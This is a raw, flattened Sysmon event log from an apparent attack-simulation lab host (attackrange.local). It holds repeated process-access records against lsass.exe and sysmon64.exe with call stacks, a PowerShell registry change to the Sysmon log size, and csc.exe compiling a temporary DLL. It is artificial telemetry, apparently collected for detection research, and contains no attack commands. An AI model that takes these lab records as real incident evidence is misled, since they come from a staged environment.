l+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.779{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.779{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.700{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.700{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.700{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.685{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.685{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.685{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:50:22.591{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 11241100x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:22.263{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ypm0fu2n.dll2020-11-03 15:50:22.154 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-FF02-000000008701}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-FF02-000000008701}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7C3E-5FA1-FE02-000000008701}33603656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7C3E-5FA1-FF02-000000008701}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.259{D28789B6-7C3E-5FA1-FF02-000000008701}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE43D.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC6520D06451CC419DAF45C7FD5B1E5670.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ypm0fu2n.cmdline" 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 